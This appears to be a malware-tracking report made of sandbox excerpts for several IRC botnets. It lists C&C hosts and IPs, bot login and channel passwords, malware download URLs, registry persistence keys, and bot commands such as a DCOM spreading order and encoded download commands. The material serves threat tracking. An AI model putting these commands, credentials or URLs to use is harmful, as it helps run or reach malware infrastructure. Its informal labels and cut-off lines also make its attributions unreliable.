Remote Host      Port Number
174.37.200.82    80
63.135.80.224    80
63.135.80.46     80
64.208.241.27    80
66.220.149.25    80
64.202.107.109   1234

PASS xxx
JOIN #!nn! test
MODE NEW-[USA|00|P|82252] -ix
PONG 22
MOTD
NICK NEW-[USA|00|P|82252]
USER XP-0038 * 0 :COMPUTERNAME

* The data identified by the following URLs was then requested from the remote web server:
  o http://174.37.200.82/index.php
  o http://browseusers.myspace.com/Browse/Browse.aspx
  ...

leaf.15781.com (botnet hosted with United States Lancaster Comcast Business Communications Inc)

Resolved : [leaf.15781.com] To [174.137.125.78]

Remote Host      Port Number
173.163.15.116   9595
PASS prison
204.13.248.70    80
72.233.89.199    80

NICK {00-USA-XP-COMP-7851}
PONG leaf.15781.com
NICK {iNF-00-USA-XP-COMP-3925}
USER MEAT * 0 :COMP
JOIN ###mini

Now talking in ###mini
Topic By: [ pe[ro ]
Modes On: [ ###mini ] [ +smntu ]
Now talking in ###USA
Topic On: [ ###USA ...

nice.niceshot.in (botnet hosted with United States Atlanta Global Net Access Llc)

DNS Lookup
Host Name          IP Address
dell-d3e62f7e26    10.1.9.2
nice.niceshot.in   207.210.96.152

C&C Server: 207.210.96.152:6567
Server Password:
Username: XP-9009
Nickname: [SI|DEU|00|P|70534]
Channel: #cuchi# (Password: c1rc0dus0leil)
Channeltopic:

C&C Server: 207.210.96.152:6567
Server Password:
Username: XP-4274
Nickname: [SI|DEU|00|P|34816]
Channel: #cuchi# (Password: c1rc0dus0leil)
Channeltopic:

Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Service ares” = conmysys.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run ...

nvps.michelle.com (Burimi big hecker ddosing SnK also hecker)

Remote Host     Port Number
209.236.69.47   81

NOTICE IRC : V3RS10N 15D3v1Lz Sp 14yB0t M0d3d A nd C0d3d By 14sNo0p_Do0g For 15D3v1Lz T34m
PRIVMSG #spy : winhostmanager.net P: 22 D: 150 T:1500. L3ts Th3 D3v1Lz W0rk! T1ll H3 G3t D1sc0nn3ct3d.
JOIN #Spy Spy
MODE UserName85 +i
MODE #spy +ntusMm
x1x4x0.net P: 5500 D: 150 T:1500. L3ts ...

img1.alyoy.in (malware hosted with United States Missoula Sharktech Internet Services)

DNS Lookup
Host Name       IP Address
img1.alyoy.in   70.39.100.4
70.39.100.4     70.39.100.4
0               127.0.0.1

UDP Connections
Remote IP Address: 127.0.0.1 Port: 1037
Send Datagram: 113 packet(s) of size 1
Recv Datagram: 113 packet(s) of size 1

Download URLs
http://70.39.100.4/img/img.txt (img1.alyoy.in)
http://70.39.100.4/img/YdtaOeu0lfMm1.exe (img1.alyoy.in)

Outgoing connection to remote server: img1.alyoy.in TCP port 61688
Outgoing connection to remote server: img1.alyoy.in ...

d14-69-123-212.try.wideopenwest.com (botnet hosted with WIDEOPENWEST.COM Michigan)

Remote Host     Port Number
69.14.212.123   65267

PASS daloot
JOIN #NzM# screwu
USERHOST USA|00|XP|SP2|3342046
MODE USA|00|XP|SP2|3342046 -x+i
PRIVMSG #NzM# : (patcher.p fixed, version 1.
NICK USA|00|XP|SP2|3342046
USER pnlzszqe 0 0 :USA|00|XP|SP2|3342046
PONG :A2E3B7DC

Now talking in #NzM#
Topic On: [ #NzM# ] [ .root.start dcom135 200 0 0 109.x.x.x -a -b -r -s ]
Topic By: ...

beautybiz.no-ip.org (backdoored passwd stealer)

DNS Lookup
Host Name             IP Address
beautybiz.no-ip.org   84.19.169.234

Outgoing connection to remote server: beautybiz.no-ip.org TCP port 80

DNS Lookup
Host Name   IP Address
127.0.0.1   127.0.0.1

Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “UserInit” = C:\WINDOWS\system32\userinit.exe,C:\Windupdt\winupdate.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “winupdater” = C:\Windupdt\winupdate.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System “DisableRegistryTools” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile “EnableFirewall” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile ...

ush.nerashti.net (Burimi the lamer)

Resolved : [ush.nerashti.net] To [109.123.108.61]
Resolved : [ush.nerashti.net] To [174.127.127.137]
Resolved : [ush.nerashti.net] To [77.68.52.6]

DNS Lookup
Host Name          IP Address
ush.nerashti.net   77.68.52.6

C&C Server: 77.68.52.6:81
Server Password:
Username: n
Nickname: n|DEU|XP|DELL-D3E62F7E26|mmxwpcz
Channel: #win# (Password: )
Channeltopic: :.im /99/106/112/81/55/59/40/125/111/122/35/104/108/44/39/100/113/109/110/59/106/120/102/9/83/106/112/124/99/123/124/36/112/107/113/31/60/117/96/71/109/105/110/103/107/112/46/57/37/59/38/42/23/8/65/72/83/

Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\S-3685-5437-5687\winsrvn.exe” = C:\Dokumente und ...

174.127.127.137.static.midphase.com (Burimi’s botnet hosted in United States Providence Hosting Services Inc)

Remote Host       Port Number
174.127.127.137   81

NICK n[USA|XP|COMPUTERNAME]xvfnrcj
USER n “” “lol” :n
JOIN #bul#
PONG 422
PONG :request4.not.found

Now talking in #bul#
Topic On: [ #bul# ] [ 13 .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/ ]
Topic By: [ n ]
(abc) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/
(RDP) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/

Registry Modifications
* The newly created Registry Value is:
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] ...

trin.bi.up.ac.za (botnet hosted with South Africa Pretoria Afrinic)

Remote Host      Port Number
137.215.75.246   6667
195.197.175.21   6667

NICK drugss
ISON akon black bleed blood dead devil dr evil ghost hustler lord Lucifer mad ManaGer Master mIRC Mr Power sadness Scorpions system
JOIN #Raps
MODE #raps
MODE mwahc +iwx
MODE drugss +iwx
SILENCE +*!*@*
USER net “” “rap-yo-city.dyndns.org” : 6Get away !
NICK samerl
USER ...